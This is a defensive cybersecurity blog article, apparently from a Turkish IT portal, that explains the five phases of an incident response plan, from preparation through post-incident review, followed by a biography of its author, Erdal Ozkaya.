Incident Response and Management

A successful approach to incident response and management ensures that an organization is set up for success to protect their organizations information.

This is achieved by developing and implementing an incident response plan. With that in place, organizations are able to protect, detect, and respond as fast as possible to a service disruption. The employees that are part of the Security Operations Center (SOC) and are tasked to follow
the incident response plan bear responsibility for remediating as fast as possible any potential breach. The following diagram shows the most commonly adopted incident response plan approach, which will be detailed in this article:

Phase 1 – preparation

The preparation phase is the starting point of an incident response plan. It summarizes all of the activities that are performed before a cybersecurity incident. Center to this phase is developing the incident response plan itself. What’s important to understand is that an incident response plan isn’t just a document created once and never looked at again, but instead becomes a living document inside the security operations team.

When organizations start writing an incident response plan, it often gives them the opportunity to also reassess their current security controls and compare them to industry and vendor best practices. It allows them to detect any unknown point or unaware security loopholes. As the organization matures and handles more cybersecurity incidents, there will be learning outcomes, which will allow the organization to further optimize the incident response plan.

Regardless of how many cyberattacks and service disruptions the individuals in the team might have experienced, there’s always new learning available.

Phase 2 – detection and analysis

Detection and analysis is the phase where the security operations team need to determine whether there’s a true cybersecurity incident and, once confirmed, determine quickly the scope of breach due to that cybersecurity incident. The team needs to be able to determine quickly whether a specific activity was done by an actual employee or potentially a threat actor that tries to mimic the behavior of an employee. As an example, when Microsoft
Word launches on an endpoint that doesn’t mean that a threat actor is doing anything. Microsoft Word is used by almost all organizations in the world and the chances of that individual activity to be malicious is unlikely. However, when, during analysis, it’s determined that Microsoft Word executed in the background of a PowerShell script, this is a bit more unlikely. This is just one of thousands of examples on the level of detail that
needs to be analyzed.

Phase 3 – containment

The containment phase is one of the most important phases as part of the incident response plan. In this phase, it’s very likely that the containment phase will cause service disruption,but it’s essential in order to ensure no further damage is caused.

In this phase, the security team will attempt to contain the situation. The risk of not containing it and to just continue running operations is too high as it can cause not only short term, but also mid and long term, exponentially higher damage. Consider the scenario where a cyberattack isn’t contained: the security team recovers an IT service and, once recovered, it’s compromised again. This is because the cybersecurity incident hadn’t been contained first before doing the recovery.

Phase 4 – eradication and recovery

Eradication and recovery are two separate processes that can potentially happen at the same time. With eradication, the organization ensures that it removes all of the artifacts and components associated with the cybersecurity incident. Some good examples for eradication are, for example, the deletion of the malware, deleting the emails received as
part of the phishing campaign that were the entry point for the cyberattack, or disabling compromised user accounts.

The recovery process is what the organization will always push the security team to perform as fast as possible. But it’s important to not rush, stay
calm, and follow the incident response plan. Remember, when recovering an environment, you want to make sure that the threat actor can’t breach it seconds after recovery again.

This step contains restoring the systems to an operational stage but also covers hardening the systems to ensure that the same attack pattern can’t happen again.

Phase 5 – post-incident activity

As much as it’s important to end the service disruption and enable the business to operate, it’s also important to perform a post-mortem after resolving the cybersecurity incident.

Cybersecurity is a continuous learning space and, only by learning from the past, can organizations can truly mature in their cybersecurity practice. In the post-incident activity phase, the team reviews the cybersecurity incident to deeply understand how the attack happened in the first place and what could have been done to prevent the attack happening, as well as how to improve the approach to incident response. The findings of
the post-incident activity phase directly impact how phase 1 (preparation) is performed moving forward.


Dr. Erdal Ozkaya is a leading Cybersecurity Professional with business development, management, and Academic skills who focuses on securing the Cyber Space & sharing his real-life skills as a Security Adviser, Speaker, Lecturer, and Author. Erdal is known to be passionate about reaching communities, and creating cyber aware campaigns and leveraging new and innovative approaches and technologies to holistically address the information security and privacy needs for every person and organization in the world. He has authored many cybersecurity books as well as security certification courseware and exams for different vendors. Erdal has the following qualifications: Doctor of Philosophy in Cybersecurity. Master of Computing Research, Master of Information Systems Security, Bachelor of Information Technology, Microsoft Certified Trainer, Microsoft Certified Learning Consultant, ISO27001 Auditor & Implementer, Certified Ethical Hacker (CEH), Certified Ethical Instructor & Licensed Penetration Tester. He is an award-winning technical expert & speaker: His recent awards are: CISO Top 50 Award by Security ME Adviser Magazine & (2020) Legend Cybersecurity Pro by GEC Media (2019) Hall of Fame, CISO Magazine(2019) Cybersecurity Influencer of the year (2019) , CISO Magazine Cyber Security Professional of the year MEA (2019) Microsoft Circle of Excellence Platinum Club (2017), NATO Center of Excellence (2016) Security Professional of the year by MEA Channel Magazine (2015), Professional of the year Sydney (2014) and many speakers of the year awards at conferences. He also holds Global Instructor of the year awards from EC Council & Microsoft as well as Logical Operations. Erdal is also a part-time lecturer at Australian Charles Sturt University Erdal’s Social Media Accounts to follow: Twitter: LinkedIn FaceBook Instagram Amazon He has built and managed CEO IT from scratch into a multi-million dollars National Training & IT Solutions center. With the skills, he has gained, he has introduced & repeated the success with KEMP Technologies, where he was tasked to single-handedly manage the ANZ region and then build the business in the Asia Pacific region. From there he joined Secunia as CISO in Dubai and extended his experience in Middle East & Africa. Beginning of 2016 he joined Microsoft as a Cybersecurity Architect / Trusted Security advisor where he is responsible in the EMEA region. Erdal currently works at Standard Chartered Bank as Head of Infomation and Cyber Security in a Managing Director status.

İlgili Makaleler

2 Yorum

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.

Başa dön tuşu

Reklam Engelleyici Algılandı

ÇözümPark Bilişim Portalı gönüllü bir organizasyon olup tek gelir kaynağı reklamlardır. Bu nedenle siteyi gezerken lütfen reklam engelleme eklentinizi kapatın veya Çözümpark web sitesi için izin tanımı yapın. Anlayışınız için teşekkürler.